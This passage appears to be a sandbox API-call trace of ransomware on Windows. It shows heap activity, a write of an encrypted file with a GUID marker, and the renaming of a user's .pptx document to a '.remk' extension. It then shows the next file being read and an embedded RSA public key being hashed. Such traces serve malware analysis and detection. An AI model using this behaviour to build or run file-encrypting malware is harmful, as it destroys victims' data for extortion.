HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5498 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee160 [0232.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee100 [0232.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee118 [0232.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0232.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee0e8 [0232.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee178 [0232.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0232.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee148 [0232.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee130 [0232.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee190 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee130 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee130 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee148 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee100 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee100 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee160 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee190 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0232.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee100 | out: hHeap=0x630000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0232.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee130 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee178 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee118 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee0e8 | out: hHeap=0x630000) returned 1 [0232.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee0d0 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c1d40 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.044] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x899d, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x899d, lpOverlapped=0x0) returned 1 [0232.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0232.045] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x89a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.045] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0232.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0232.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0232.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.045] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0232.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.045] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.045] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.046] CloseHandle (hObject=0x640) returned 1 [0232.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0232.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.050] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uq-Qf59QnD_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uq-qf59qnd_.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uq-Qf59QnD_.pptx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uq-qf59qnd_.pptx.remk")) returned 1 [0232.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.051] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0232.053] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e702860, ftCreationTime.dwHighDateTime=0x1d5e4bc, ftLastAccessTime.dwLowDateTime=0x7b9ac0, ftLastAccessTime.dwHighDateTime=0x1d5e5cb, ftLastWriteTime.dwLowDateTime=0x7b9ac0, ftLastWriteTime.dwHighDateTime=0x1d5e5cb, nFileSizeHigh=0x0, nFileSizeLow=0x13f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WsiU9HhiMmh5taXUMi.odp", cAlternateFileName="WSIU9H~1.ODP")) returned 1 [0232.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0232.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.053] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WsiU9HhiMmh5taXUMi.odp") returned=".odp" [0232.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WsiU9HhiMmh5taXUMi.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wsiu9hhimmh5taxumi.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.054] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=5111) returned 1 [0232.054] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.057] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.057] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.059] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.059] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x13f7, lpOverlapped=0x0) returned 1 [0232.060] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.060] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.060] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.060] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.061] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.061] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.061] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.061] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.061] GetLastError () returned 0x0 [0232.061] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.061] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.062] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.062] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.062] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1400) returned 0x37bb408 [0232.062] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0232.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1d40 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee0d0 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1d88 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee0e8 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee118 [0232.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee178 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee130 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0232.063] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee118 | out: hHeap=0x630000) returned 1 [0232.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee130 | out: hHeap=0x630000) returned 1 [0232.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee178 | out: hHeap=0x630000) returned 1 [0232.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee178 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee130 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee118 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0232.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee130 | out: hHeap=0x630000) returned 1 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee118 | out: hHeap=0x630000) returned 1 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee178 | out: hHeap=0x630000) returned 1 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0232.064] GetCurrentThreadId () returned 0x314 [0232.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b8c00 